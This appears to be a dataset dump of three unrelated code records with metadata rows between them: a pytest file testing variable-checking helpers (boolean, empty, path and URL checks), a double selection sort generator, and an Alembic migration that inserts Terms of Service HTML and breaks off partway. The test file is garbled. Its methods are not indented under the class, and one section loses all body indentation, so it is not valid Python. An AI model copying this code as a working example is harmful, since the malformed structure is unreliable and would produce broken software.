18241efc0ac78c796043a798b520304d8b0a6d03
|
[
"MIT"
] | 9
|
2019-09-14T00:29:26.000Z
|
2019-09-14T05:36:32.000Z
|
tests/test_util.py
|
constrict0r/unify
|
18241efc0ac78c796043a798b520304d8b0a6d03
|
[
"MIT"
] | null | null | null |
# Util tests, from root folder run: ./testme.sh.
import pytest
import unittest
@pytest.mark.usefixtures('global_variables')
class util_tests_plugin(unittest.TestCase):
# tests index.
def test_test(self):
    # The module under test exposes a tests() index listing every check name.
    tests_list = self.util_var['test_mod'].tests()
    assert "user_root" in tests_list
    assert "variable_boolean" in tests_list
    assert "variable_boolean_true" in tests_list
    assert "variable_collection" in tests_list
    assert "variable_empty" in tests_list
    assert "variable_path" in tests_list
    assert "variable_url" in tests_list
    assert "variable_url_existent" in tests_list
# user_root.
# user_root(name) is truthy only for the literal user name 'root'.
def test_user_root_with_root(self):
    assert self.util_var['test_mod'].user_root('root')
def test_user_root_with_nobody(self):
    assert not self.util_var['test_mod'].user_root('nobody')
def test_user_root_with_empty(self):
    assert not self.util_var['test_mod'].user_root()
def test_user_root_with_none(self):
    assert not self.util_var['test_mod'].user_root(None)
# variable_boolean.
# variable_boolean(v) detects boolean-LIKE values ('true'/'false', True/False,
# 'yes'/'no') regardless of their truth value; everything else is rejected.
def test_variable_boolean_with_none(self):
    assert not self.util_var['test_mod'].variable_boolean(None)
def test_variable_boolean_with_none_string(self):
    assert not self.util_var['test_mod'].variable_boolean('None')
def test_variable_boolean_with_null_string(self):
    assert not self.util_var['test_mod'].variable_boolean('null')
# NOTE(review): double underscore in this name looks like a typo.
def test_variable_boolean__with_empty(self):
    assert not self.util_var['test_mod'].variable_boolean('')
def test_variable_boolean_with_undefined_string(self):
    text = self.util_var['undefined_str']
    assert not self.util_var['test_mod'].variable_boolean(text)
def test_variable_boolean_with_embedded_variable(self):
    # '{{' is an (unexpanded) template variable marker, not a boolean.
    assert not self.util_var['test_mod'].variable_boolean('{{')
def test_variable_boolean_with_empty_collection(self):
    assert not self.util_var['test_mod'].variable_boolean('{}')
    assert not self.util_var['test_mod'].variable_boolean('[]')
def test_variable_boolean_with_non_empty(self):
    assert not self.util_var['test_mod'].variable_boolean('hello')
def test_variable_boolean_with_non_empty_collection(self):
    test_dict = self.util_var['test_dict']
    test_list = self.util_var['test_list']
    assert not self.util_var['test_mod'].variable_boolean(test_dict)
    assert not self.util_var['test_mod'].variable_boolean(test_list)
def test_variable_boolean_with_unexistent_path(self):
    a_file = self.util_var['unexistent_file']
    assert not self.util_var['test_mod'].variable_boolean(a_file)
def test_variable_boolean_with_existent_path(self):
    a_file = self.util_var['existent_file']
    assert not self.util_var['test_mod'].variable_boolean(a_file)
def test_variable_boolean_with_unexistent_url(self):
    an_url = self.util_var['unexistent_url']
    assert not self.util_var['test_mod'].variable_boolean(an_url)
def test_variable_boolean_with_existent_url(self):
    an_url = self.util_var['existent_url']
    assert not self.util_var['test_mod'].variable_boolean(an_url)
# Accepted boolean spellings ('false'/'no'/False count as boolean-like too).
def test_variable_boolean_with_true(self):
    assert self.util_var['test_mod'].variable_boolean('true')
def test_variable_boolean_with_false(self):
    assert self.util_var['test_mod'].variable_boolean('false')
def test_variable_boolean_with_True(self):
    assert self.util_var['test_mod'].variable_boolean(True)
def test_variable_boolean_with_False(self):
    assert self.util_var['test_mod'].variable_boolean(False)
def test_variable_boolean_with_yes(self):
    assert self.util_var['test_mod'].variable_boolean('yes')
def test_variable_boolean_with_no(self):
    assert self.util_var['test_mod'].variable_boolean('no')
# variable_boolean_true.
# variable_boolean_true(v) is stricter: only TRUE boolean values pass
# ('true', True, 'yes'); 'false'/False/'no' and non-booleans all fail.
def test_variable_boolean_true_with_none(self):
    assert not self.util_var['test_mod'].variable_boolean_true(None)
def test_variable_boolean_true_with_none_string(self):
    assert not self.util_var['test_mod'].variable_boolean_true('None')
def test_variable_boolean_true_with_null_string(self):
    assert not self.util_var['test_mod'].variable_boolean_true('null')
# NOTE(review): double underscore in this name looks like a typo.
def test_variable_boolean_true__with_empty(self):
    assert not self.util_var['test_mod'].variable_boolean_true('')
def test_variable_boolean_true_with_undefined_string(self):
    text = self.util_var['undefined_str']
    assert not self.util_var['test_mod'].variable_boolean_true(text)
def test_variable_boolean_true_with_embedded_variable(self):
    assert not self.util_var['test_mod'].variable_boolean_true('{{')
def test_variable_boolean_true_with_empty_collection(self):
    assert not self.util_var['test_mod'].variable_boolean_true('{}')
    assert not self.util_var['test_mod'].variable_boolean_true('[]')
def test_variable_boolean_true_with_non_empty(self):
    assert not self.util_var['test_mod'].variable_boolean_true('hello')
def test_variable_boolean_true_with_non_empty_collection(self):
    test_dict = self.util_var['test_dict']
    test_list = self.util_var['test_list']
    assert not self.util_var['test_mod'].variable_boolean_true(test_dict)
    assert not self.util_var['test_mod'].variable_boolean_true(test_list)
def test_variable_boolean_true_with_unexistent_path(self):
    a_file = self.util_var['unexistent_file']
    assert not self.util_var['test_mod'].variable_boolean_true(a_file)
def test_variable_boolean_true_with_existent_path(self):
    a_file = self.util_var['existent_file']
    assert not self.util_var['test_mod'].variable_boolean_true(a_file)
def test_variable_boolean_true_with_unexistent_url(self):
    an_url = self.util_var['unexistent_url']
    assert not self.util_var['test_mod'].variable_boolean_true(an_url)
def test_variable_boolean_true_with_existent_url(self):
    an_url = self.util_var['existent_url']
    assert not self.util_var['test_mod'].variable_boolean_true(an_url)
def test_variable_boolean_true_with_true(self):
    assert self.util_var['test_mod'].variable_boolean_true('true')
def test_variable_boolean_true_with_false(self):
    assert not self.util_var['test_mod'].variable_boolean_true('false')
def test_variable_boolean_true_with_True(self):
    assert self.util_var['test_mod'].variable_boolean_true(True)
def test_variable_boolean_true_with_False(self):
    assert not self.util_var['test_mod'].variable_boolean_true(False)
def test_variable_boolean_true_with_yes(self):
    assert self.util_var['test_mod'].variable_boolean_true('yes')
def test_variable_boolean_true_with_no(self):
    assert not self.util_var['test_mod'].variable_boolean_true('no')
# variable_collection.
def test_variable_collection_with_none(self):
assert not self.util_var['test_mod'].variable_collection(None)
def test_variable_collection_with_none_string(self):
assert not self.util_var['test_mod'].variable_collection('None')
def test_variable_collection_with_null_string(self):
assert not self.util_var['test_mod'].variable_collection('null')
def test_variable_collection__with_empty(self):
assert not self.util_var['test_mod'].variable_collection('')
def test_variable_collection_with_undefined_string(self):
text = self.util_var['undefined_str']
assert not self.util_var['test_mod'].variable_collection(text)
def test_variable_collection_with_embedded_variable(self):
assert not self.util_var['test_mod'].variable_collection('{{')
def test_variable_collection_with_empty_collection(self):
assert not self.util_var['test_mod'].variable_collection('{}')
assert not self.util_var['test_mod'].variable_collection('[]')
def test_variable_collection_with_non_empty(self):
assert not self.util_var['test_mod'].variable_collection('hello')
def test_variable_collection_with_non_empty_collection(self):
test_dict = self.util_var['test_dict']
test_list = self.util_var['test_list']
assert self.util_var['test_mod'].variable_collection(test_dict)
assert self.util_var['test_mod'].variable_collection(test_list)
def test_variable_collection_with_unexistent_path(self):
a_file = self.util_var['unexistent_file']
assert not self.util_var['test_mod'].variable_collection(a_file)
def test_variable_collection_with_existent_path(self):
a_file = self.util_var['existent_file']
assert not self.util_var['test_mod'].variable_collection(a_file)
def test_variable_collection_with_unexistent_url(self):
an_url = self.util_var['unexistent_url']
assert not self.util_var['test_mod'].variable_collection(an_url)
def test_variable_collection_with_existent_url(self):
an_url = self.util_var['existent_url']
assert not self.util_var['test_mod'].variable_collection(an_url)
# variable_empty.
def test_variable_empty_with_none(self):
    """None counts as empty."""
    assert self.util_var['test_mod'].variable_empty(None)

def test_variable_empty_with_none_string(self):
    """The literal string 'None' counts as empty."""
    assert self.util_var['test_mod'].variable_empty('None')

def test_variable_empty_with_null_string(self):
    """The literal string 'null' counts as empty."""
    assert self.util_var['test_mod'].variable_empty('null')

def test_variable_empty_with_empty(self):
    """The empty string counts as empty."""
    assert self.util_var['test_mod'].variable_empty('')

def test_variable_empty_with_undefined_string(self):
    """The fixture's undefined-marker string counts as empty."""
    marker = self.util_var['undefined_str']
    assert self.util_var['test_mod'].variable_empty(marker)

def test_variable_empty_with_embedded_variable(self):
    """An unresolved template marker '{{' counts as empty."""
    assert self.util_var['test_mod'].variable_empty('{{')

def test_variable_empty_with_empty_collection(self):
    """Empty-collection literals '{}' and '[]' count as empty."""
    module = self.util_var['test_mod']
    assert module.variable_empty('{}')
    assert module.variable_empty('[]')

def test_variable_empty_with_non_empty(self):
    """An ordinary non-empty string is not empty."""
    assert not self.util_var['test_mod'].variable_empty('amanita')

def test_variable_empty_with_non_empty_collection(self):
    """Populated dict and list fixtures are not empty."""
    module = self.util_var['test_mod']
    assert not module.variable_empty(self.util_var['test_dict'])
    assert not module.variable_empty(self.util_var['test_list'])

def test_variable_empty_with_unexistent_path(self):
    """A missing-file path string is still a value, hence not empty."""
    path = self.util_var['unexistent_file']
    assert not self.util_var['test_mod'].variable_empty(path)

def test_variable_empty_with_existent_path(self):
    """An existing-file path string is not empty."""
    path = self.util_var['existent_file']
    assert not self.util_var['test_mod'].variable_empty(path)

def test_variable_empty_with_unexistent_url(self):
    """An unreachable URL string is not empty."""
    url = self.util_var['unexistent_url']
    assert not self.util_var['test_mod'].variable_empty(url)

def test_variable_empty_with_existent_url(self):
    """A reachable URL string is not empty."""
    url = self.util_var['existent_url']
    assert not self.util_var['test_mod'].variable_empty(url)
# variable_path.
def test_variable_path_with_none(self):
    """None is not a path."""
    assert not self.util_var['test_mod'].variable_path(None)

def test_variable_path_with_none_string(self):
    """The literal string 'None' is not a path."""
    assert not self.util_var['test_mod'].variable_path('None')

def test_variable_path_with_null_string(self):
    """The literal string 'null' is not a path."""
    assert not self.util_var['test_mod'].variable_path('null')

def test_variable_path_with_empty(self):
    """The empty string is not a path."""
    assert not self.util_var['test_mod'].variable_path('')

def test_variable_path_with_undefined_string(self):
    """The fixture's undefined-marker string is not a path."""
    marker = self.util_var['undefined_str']
    assert not self.util_var['test_mod'].variable_path(marker)

def test_variable_path_with_embedded_variable(self):
    """An unresolved template marker '{{' is not a path."""
    assert not self.util_var['test_mod'].variable_path('{{')

def test_variable_path_with_empty_collection(self):
    """Empty-collection literals are not paths."""
    module = self.util_var['test_mod']
    assert not module.variable_path('{}')
    assert not module.variable_path('[]')

def test_variable_path_with_non_empty(self):
    """An ordinary word that names no existing file is not a path."""
    assert not self.util_var['test_mod'].variable_path('amanita')

def test_variable_path_with_non_empty_collection(self):
    """Dict and list values are never paths."""
    module = self.util_var['test_mod']
    assert not module.variable_path(self.util_var['test_dict'])
    assert not module.variable_path(self.util_var['test_list'])

def test_variable_path_with_unexistent_path(self):
    """A path to a missing file does not qualify."""
    path = self.util_var['unexistent_file']
    assert not self.util_var['test_mod'].variable_path(path)

def test_variable_path_with_existent_path(self):
    """Only a path to an existing file qualifies."""
    path = self.util_var['existent_file']
    assert self.util_var['test_mod'].variable_path(path)

def test_variable_path_with_unexistent_url(self):
    """URL strings are not filesystem paths."""
    url = self.util_var['unexistent_url']
    assert not self.util_var['test_mod'].variable_path(url)

def test_variable_path_with_existent_url(self):
    """Even a reachable URL is not a filesystem path."""
    url = self.util_var['existent_url']
    assert not self.util_var['test_mod'].variable_path(url)
# variable_url.
def test_variable_url_with_none(self):
    """None is not a URL."""
    assert not self.util_var['test_mod'].variable_url(None)

def test_variable_url_with_none_string(self):
    """The literal string 'None' is not a URL."""
    assert not self.util_var['test_mod'].variable_url('None')

def test_variable_url_with_null_string(self):
    """The literal string 'null' is not a URL."""
    assert not self.util_var['test_mod'].variable_url('null')

def test_variable_url_with_empty(self):
    """The empty string is not a URL."""
    assert not self.util_var['test_mod'].variable_url('')

def test_variable_url_with_undefined_string(self):
    """The fixture's undefined-marker string is not a URL."""
    marker = self.util_var['undefined_str']
    assert not self.util_var['test_mod'].variable_url(marker)

def test_variable_url_with_embedded_variable(self):
    """An unresolved template marker '{{' is not a URL."""
    assert not self.util_var['test_mod'].variable_url('{{')

def test_variable_url_with_empty_collection(self):
    """Empty-collection literals are not URLs."""
    module = self.util_var['test_mod']
    assert not module.variable_url('{}')
    assert not module.variable_url('[]')

def test_variable_url_with_non_empty(self):
    """An ordinary word is not a URL."""
    assert not self.util_var['test_mod'].variable_url('amanita')

def test_variable_url_with_non_empty_collection(self):
    """Dict and list values are never URLs."""
    module = self.util_var['test_mod']
    assert not module.variable_url(self.util_var['test_dict'])
    assert not module.variable_url(self.util_var['test_list'])

def test_variable_url_with_unexistent_path(self):
    """File paths, missing or not, are not URLs."""
    path = self.util_var['unexistent_file']
    assert not self.util_var['test_mod'].variable_url(path)

def test_variable_url_with_existent_path(self):
    """Even an existing file path is not a URL."""
    path = self.util_var['existent_file']
    assert not self.util_var['test_mod'].variable_url(path)

def test_variable_url_with_unexistent_url(self):
    # An unreachable URL still qualifies: per these fixtures variable_url
    # accepts both reachable and unreachable URLs, i.e. it does not check
    # reachability (contrast variable_url_existent below).
    url = self.util_var['unexistent_url']
    assert self.util_var['test_mod'].variable_url(url)

def test_variable_url_with_existent_url(self):
    """A reachable URL qualifies."""
    url = self.util_var['existent_url']
    assert self.util_var['test_mod'].variable_url(url)
# variable_url_existent.
def test_variable_url_existent_with_none(self):
    """None is not an existent URL."""
    assert not self.util_var['test_mod'].variable_url_existent(None)

def test_variable_url_existent_with_none_string(self):
    """The literal string 'None' is not an existent URL."""
    nostr = 'None'
    assert not self.util_var['test_mod'].variable_url_existent(nostr)

def test_variable_url_existent_with_null_string(self):
    """The literal string 'null' is not an existent URL."""
    nulst = 'null'
    assert not self.util_var['test_mod'].variable_url_existent(nulst)

def test_variable_url_existent_with_empty(self):
    """The empty string is not an existent URL."""
    assert not self.util_var['test_mod'].variable_url_existent('')

def test_variable_url_existent_with_undefined_string(self):
    """The fixture's undefined-marker string is not an existent URL."""
    a_str = self.util_var['undefined_str']
    assert not self.util_var['test_mod'].variable_url_existent(a_str)

def test_variable_url_existent_with_embedded_variable(self):
    """An unresolved template marker '{{' is not an existent URL."""
    assert not self.util_var['test_mod'].variable_url_existent('{{')

def test_variable_url_existent_with_empty_collection(self):
    """Empty-collection literals are not existent URLs."""
    assert not self.util_var['test_mod'].variable_url_existent('{}')
    assert not self.util_var['test_mod'].variable_url_existent('[]')

def test_variable_url_existent_with_non_empty(self):
    """A bare word is not an existent URL.

    BUG FIX: this test previously asserted on variable_path('amanita'),
    so variable_url_existent() was never exercised for this case.
    """
    assert not self.util_var['test_mod'].variable_url_existent('amanita')

def test_variable_url_existent_with_non_empty_collection(self):
    """Dict and list values are not existent URLs."""
    adict = self.util_var['test_dict']
    alist = self.util_var['test_list']
    assert not self.util_var['test_mod'].variable_url_existent(adict)
    assert not self.util_var['test_mod'].variable_url_existent(alist)

def test_variable_url_existent_with_unexistent_path(self):
    """A missing file path is not an existent URL."""
    afile = self.util_var['unexistent_file']
    assert not self.util_var['test_mod'].variable_url_existent(afile)

def test_variable_url_existent_with_existent_path(self):
    """Even an existing file path is not an existent URL."""
    afile = self.util_var['existent_file']
    assert not self.util_var['test_mod'].variable_url_existent(afile)

def test_variable_url_existent_with_unexistent_url(self):
    # Unlike variable_url, this check rejects a well-formed but
    # unreachable URL, i.e. it verifies reachability.
    a_url = self.util_var['unexistent_url']
    assert not self.util_var['test_mod'].variable_url_existent(a_url)

def test_variable_url_existent_with_existent_url(self):
    """Only a reachable URL qualifies."""
    test_url = self.util_var['existent_url']
    assert self.util_var['test_mod'].variable_url_existent(test_url)
| 42.589372
| 77
| 0.73843
| 2,544
| 17,632
| 4.661164
| 0.024371
| 0.115365
| 0.158627
| 0.172036
| 0.966773
| 0.934475
| 0.883792
| 0.838253
| 0.830494
| 0.807303
| 0
| 0
| 0.158972
| 17,632
| 413
| 78
| 42.692494
| 0.799649
| 0.011343
| 0
| 0.235495
| 0
| 0
| 0.108547
| 0.002411
| 0
| 0
| 0
| 0
| 0.440273
| 1
| 0.368601
| false
| 0
| 0.006826
| 0
| 0.37884
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
2e4e709b5811c3c0121b119d53102dbaa3c99d03
| 1,559
|
py
|
Python
|
src/algorithmsv2/doubleselectionsort.py
|
BozeBro/SortingVisualizer
|
5d85b436a0e779247ecc2ed7e1e538c67fc314c6
|
[
"MIT"
] | null | null | null |
src/algorithmsv2/doubleselectionsort.py
|
BozeBro/SortingVisualizer
|
5d85b436a0e779247ecc2ed7e1e538c67fc314c6
|
[
"MIT"
] | 4
|
2021-06-08T22:35:38.000Z
|
2022-03-12T00:50:00.000Z
|
src/algorithmsv2/doubleselectionsort.py
|
BozeBro/SortingVisualizer
|
5d85b436a0e779247ecc2ed7e1e538c67fc314c6
|
[
"MIT"
] | null | null | null |
def double_selection_sort(array):
    """Sort `array` in place, yielding index pairs for visualization.

    Each pass of the outer loop scans the unsorted window [lo, hi] once,
    locating both its minimum and its maximum, then moves the minimum to
    the front of the window and the maximum to the back. Every scan step
    yields ``(i, i)`` and every swap yields the two positions exchanged,
    so a caller can animate the sort. The sorted list is also the
    generator's final ``return`` value.
    """
    lo, hi = 0, len(array) - 1
    while lo < hi:
        smallest = largest = array[lo]
        small_at = large_at = lo
        for idx in range(lo, hi + 1):
            item = array[idx]
            if item > largest:
                largest, large_at = item, idx
            elif item < smallest:
                smallest, small_at = item, idx
            yield idx, idx
        # Move the window minimum to the front.
        array[lo], array[small_at] = array[small_at], array[lo]
        yield lo, small_at
        # If the maximum was displaced by the swap above, it now sits at
        # small_at; detect that by value and swap from there instead.
        if array[small_at] == largest:
            array[hi], array[small_at] = array[small_at], array[hi]
            yield hi, small_at
        else:
            array[hi], array[large_at] = array[large_at], array[hi]
            yield hi, large_at
        lo += 1
        hi -= 1
    return array
def test_double_selection_sort(array):
    """Sort `array` in place with double selection sort and return it.

    Same algorithm as double_selection_sort() but without the
    visualization yields, so the result can be checked directly.
    """
    left, right = 0, len(array) - 1
    while left < right:
        lowest = highest = array[left]
        low_at = high_at = left
        # One scan of the unsorted window finds both extremes.
        for pos in range(left, right + 1):
            item = array[pos]
            if item > highest:
                highest, high_at = item, pos
            elif item < lowest:
                lowest, low_at = item, pos
        # Minimum goes to the front of the window.
        array[left], array[low_at] = array[low_at], array[left]
        # If the maximum was displaced by that swap, it now sits at
        # low_at; detect that by value and swap from there instead.
        if array[low_at] == highest:
            array[right], array[low_at] = array[low_at], array[right]
        else:
            array[right], array[high_at] = array[high_at], array[right]
        left += 1
        right -= 1
    return array
| 29.415094
| 71
| 0.475305
| 198
| 1,559
| 3.590909
| 0.126263
| 0.180028
| 0.182841
| 0.202532
| 0.935302
| 0.912799
| 0.859353
| 0.859353
| 0.859353
| 0.859353
| 0
| 0.011074
| 0.420783
| 1,559
| 52
| 72
| 29.980769
| 0.776301
| 0
| 0
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0
| 0
| 0.083333
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
cf036736e9ee83d60b79be6bc6a261d5a97a9ed4
| 85,138
|
py
|
Python
|
auth-api/migrations/versions/c10f494d7e10_add_tos_verion_4.py
|
argush3/sbc-auth
|
96a4de3a4358b3158540aea8c4d99e06909793f2
|
[
"Apache-2.0"
] | null | null | null |
auth-api/migrations/versions/c10f494d7e10_add_tos_verion_4.py
|
argush3/sbc-auth
|
96a4de3a4358b3158540aea8c4d99e06909793f2
|
[
"Apache-2.0"
] | null | null | null |
auth-api/migrations/versions/c10f494d7e10_add_tos_verion_4.py
|
argush3/sbc-auth
|
96a4de3a4358b3158540aea8c4d99e06909793f2
|
[
"Apache-2.0"
] | 1
|
2019-07-25T18:20:41.000Z
|
2019-07-25T18:20:41.000Z
|
"""add tos verion 4
Revision ID: c10f494d7e10
Revises: aaa29018c0a1
Create Date: 2020-12-24 11:04:39.997395
"""
import sqlalchemy as sa
from alembic import op
from sqlalchemy.sql import column, table
from sqlalchemy import Integer, String
# revision identifiers, used by Alembic.
revision = 'c10f494d7e10'  # this migration's id
down_revision = 'aaa29018c0a1'  # parent migration to downgrade to
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
documents = table('documents',
column('version_id', String),
column('type', String),
column('content_type', String),
column('content', String))
html_content = """
<section>
<p>The parties to this “BC Registry Terms and Conditions of Agreement” (the “Agreement”) are Her Majesty the Queen in Right of the Province of British Columbia, as represented by the Minister of Citizens’ Services (the “Province”) and the Subscriber (as defined below).</p>
</section>
<section>
<header>1. Definitions</header>
<ul>
<li><span>a.</span><strong>"Access"</strong> means the non-exclusive right to electronically access and use the Service;</li>
<li><span>b.</span><strong>"Additional Terms"</strong> means, as applicable to the Subscriber’s use of the Service, any of the BC Online Terms and Conditions, the API Terms, the BC Services Card Terms, the BCeID Terms, the PAD Agreement, or any combination of the foregoing;</li>
<li><span>c.</span><strong>"Basic Account Subscriber"</strong> means a Subscriber with Access for up to ten Transactions per month paying Fees for Transactions using a credit card or online banking;</li>
<li><span>d.</span><strong>"BCeID Information"</strong> means a BCeID account user ID or password, which authenticates the identity of the Subscriber or a Team Member, as the case may be, to the Service if the Subscriber or a Team Member uses a BCeID for this purpose;</li>
<li><span>e.</span><strong>"Commencement Date"</strong> means the date on which the Subscriber accepts the terms of this Agreement as part of the application process for Access;</li>
<li><span>f.</span><strong>"Content"</strong> means the Service’s Data Bases, and all associated information and documentation, including any print copy or electronic display of any information retrieved from the Data Base and associated with the Service;</li>
<li><span>g.</span><strong>"Data Base"</strong> means any data base or information stored in electronic format for which Access is made available through the Service;</li>
<li><span>h.</span><strong>"Deposit Account"</strong> has the meaning given to it in the BC Online Terms and Conditions;</li>
<li><span>i.</span><strong>"Entity"</strong> means any legal entity (including a registered society, business, or co-operative) for which certain Subscribers and Team Members may have Access through the Service;</li>
<li><span>j.</span><strong>"Fees"</strong> means all fees and charges for the Service, as described on the Website[LVAA1][MOU2], and includes without limitation, any expenses or charges incurred for Transactions, including any applicable Service Fee described in section 8.7 of this Agreement;</li>
<li><span>k.</span><strong>"Incorporation Number"</strong> means the unique numerical identifier for a Subscriber’s Entity, and when entered in conjunction with the Passcode, permits a Team Member to perform transactions with regard to that Entity;</li>
<li><span>l.</span><strong>“PAD Agreement”</strong> means the agreement referenced in section 8.4;</li>
<li><span>m.</span><strong>"Passcode"</strong> means the unique identifier issued by the Province to a Subscriber with regard to existing Entities on the Service, which enables a Team Member to have Access with regard to those Entities;</li>
<li><span>n.</span><strong>"Premium Account Subscriber"</strong> means a Subscriber with Access to unlimited Transactions that has either a Deposit Account with the Province and is charged Fees in accordance with the BC Online Terms and Conditions or has entered into a PAD Agreement and is charged Fees in accordance with that agreement;</li>
<li><span>o.</span><strong>"Service"</strong> means all products and services available through BC Registries that may be utilized by Subscriber or any of its Team Members and includes Access, Transactions and the API;</li>
<li><span>p.</span><strong>"Services Card Number"</strong> means the Subscriber’s BC Services Card number, which authenticates the identity of the Subscriber, or a Team Member, as the case may be, to the Service if the Subscriber or a Team Member uses a BC Services Card for this purpose;</li>
<li><span>q.</span><strong>"Subscriber"</strong> means a person that accesses the Service and that has accepted the terms of this Agreement, and includes Premium Account Subscribers and Basic Account Subscribers;</li>
<li><span>r.</span><strong>"Team Member"</strong> means an individual that is granted Access on the individual’s behalf, if the individual is also the Subscriber, or on behalf of the Subscriber, if the individual is an employee or is otherwise authorized to act on behalf of the Subscriber, as applicable;</li>
<li><span>s.</span><strong>"Transaction"</strong> means any action performed by the Subscriber or any of its Team Members to the Service to display, print, transfer, or obtain a copy of information contained on the Service, or where permitted by the Province, to add to or delete information from the Service; and</li>
<li><span>t.</span><strong>"Website"</strong> means the BC Registry Website at https://www.bcregistry.ca/business/auth/home/decide-business and includes all web pages and associated materials, with the exception of the Content.</li>
</ul>
</section>
<section>
<header>2. Acceptance of Agreement</header>
<ul>
<li><span>2.1</span>The Subscriber acknowledges that a duly authorized representative of the Subscriber has accepted the terms of this Agreement on behalf of the Subscriber and its Team Members.</li>
<li><span>2.2</span>The Subscriber acknowledges and agrees that:</li>
<li>
<ul>
<li><span>(a)</span>by creating a profile and/or by clicking the button acknowledging acceptance of this Agreement, each Team Member using the Services on behalf of the Subscriber also accepts, and will be conclusively deemed to have accepted, the terms of this Agreement as they pertain to the Team Member’s use of the Services;</li>
<li><span>(b)</span>the Additional Terms are incorporated herein by reference and also govern and apply to the Subscriber and to each Team Member’s use of the Service; and</li>
<li><span>(c)</span>the Subscriber will be solely responsible for its Team Members’ use of the Services, including without limitation any Fees incurred by its Team Members in connection with such Services.</li>
</ul>
</li>
<li><span>2.3</span>The Province reserves the right to make changes to the terms of this Agreement at any time without direct notice to either the Subscriber or its Team Members, as applicable. The Subscriber acknowledges and agrees that it is the sole responsibility of the Subscriber to review, and, as applicable, to ensure that its Team Members review, the terms of this Agreement on a regular basis.</li>
<li><span>2.4</span>Following the date of any such changes, the Subscriber will be conclusively deemed to have accepted any such changes on its own behalf and on behalf of its Team Members, as applicable. The Subscriber acknowledges and agrees that each of its Team Members must also accept any such changes as they pertain to the Team Member’s use of the Services.</li>
</ul>
</section>
<section>
<header>3. Authentication</header>
<ul>
<li><span>3.1</span>If a Subscriber or a Team Member has used the BC Services Card to authenticate in setting up an account to use the Service, the terms found at <a href="https://www2.gov.bc.ca/gov/content/governments/government-id/bc-services-card/log-in-with-card/terms-of-use" target="_blank">https://www2.gov.bc.ca/gov/content/governments/government-id/bc-services-card/log-in-with-card/terms-of-use</a> (the “BC Services Card Terms”) continue to apply in respect of use of the BC Services Card.</li>
<li><span>3.2</span>If the Subscriber or a Team Member has used a BCeID to authenticate in setting up an account to use the Service, the BCeID terms found at <a href="https://www.bceid.ca/aboutbceid/agreements.aspx" target="_blank">https://www.bceid.ca/aboutbceid/agreements.aspx</a> (the “BCeID Terms”) continue to apply in respect of the type of BCEID used.</li>
</ul>
</section>
<section>
<header>4. Proprietary Rights</header>
<ul>
<li><span>4.1</span>The Website and the Content is owned by the Province and/or its licensors and is protected by copyright, trademark and other laws. Except as expressly permitted in this Agreement, the Subscriber may not use, reproduce, modify or distribute, or allow any other person to use, reproduce, modify or distribute, any part of the Website in any form whatsoever without the prior written consent of the Province.</li>
</ul>
</section>
<section>
<header>5. Services</header>
<ul>
<li><span>5.1</span>The Province will provide the Subscriber and its Team Members with Access on the terms and conditions set out in this Agreement.</li>
<li><span>5.2</span>Subject to section 5.3, Access will be available during the hours published on the Website, as may be determined by the Province in its sole discretion from time to time.</li>
<li><span>5.3</span>The Province reserves the right to limit or withdraw Access at any time in order to perform maintenance of the Service or in the event that the integrity or security of the Service is compromised.</li>
<li><span>5.4</span>The Province further reserves the right to discontinue the Service at any time.</li>
<li><span>5.5</span>The Province will provide helpdesk support to assist Team Members with Access during the hours published on the Website, as may be determined by the Province in its sole discretion from time to time.</li>
<li><span>5.6</span>The Subscriber acknowledges and agrees that, for the purpose of Access:</li>
<li>
<ul>
<li><span>(a)</span>it is the Subscriber’s sole responsibility, at the Subscriber’s own expense, to provide, operate and maintain computer hardware and communications software or web browser software that is compatible with the Services; and</li>
<li><span>(b)</span>any failure to do so may impact the Subscriber’s and/or Team Member’s ability to access the Service.</li>
</ul>
</li>
</ul>
</section>
<section>
<header>6. API</header>
<ul>
<li><span>6.1</span>Premium Account Subscribers who wish to access the Content through an API will be subject to the API Terms of Use, including the requirement to contact the Province for an API key and access to the API interface.</li>
</ul>
</section>
<section>
<header>7. Subscriber Obligations</header>
<ul>
<li><span>7.1</span>The Subscriber will comply, and will ensure that all of its Team Members are aware of and will comply, with:</li>
<li>
<ul>
<li><span>(a)</span>the terms of this Agreement, including the requirements regarding the integrity and/or security of the Service set out in this Article 7; and
<li><span>(b)</span>all applicable laws, in connection with the Subscriber’s and/or Team Members’ use of the Services.</li>
</ul>
</li>
<li><span>7.2</span>The Subscriber will ensure that each Team Member:</li>
<li>
<ul>
<li><span>(a)</span>is duly authorized by the Subscriber to perform any Transaction and utilize the Service on behalf of the Subscriber;</li>
<li><span>(b)</span>maintains in confidence Services Card Numbers, BCeID Information, Incorporation Numbers and Passcodes;</li>
<li><span>(c)</span>is competent to perform a Transaction and utilize the Service;</li>
<li><span>(d)</span>has been adequately trained and instructed to perform a Transaction and utilize the Service; and</li>
<li><span>(e)</span>does not use the Service for any inappropriate or unlawful purpose.</li>
</ul>
</li>
<li><span>7.3</span>The Subscriber will not, and will ensure that its Team Members do not, take any action that would compromise the integrity and/or security of the Service or any Content.</li>
<li><span>7.4</span>Without limiting the general nature of the foregoing section, the Subscriber will not, and will ensure that its Team Members do not:</li>
<li>
<ul>
<li><span>(a)</span>use the Service or any Content for activities or for a purpose different from those for which Access was granted including without limitation any unlawful activities or purpose;</li>
<li><span>(b)</span>attempt to circumvent or subvert any security measures;</li>
<li><span>(c)</span>take any action or use any program that impedes, restricts, limits or otherwise jeopardizes the operation and/or availability of the Service or any Content;</li>
<li><span>(d)</span>take any action that might reasonably be construed as likely to adversely affect any other Subscriber, or Team Member;</li>
<li><span>(e)</span>alter or delete any information in any Data Base unless explicitly authorized to do so by the Province;</li>
<li><span>(f)</span>alter in any way whatsoever a printout or display of any information retrieved from any Data Base unless explicitly authorized to do so by the Province; or</li>
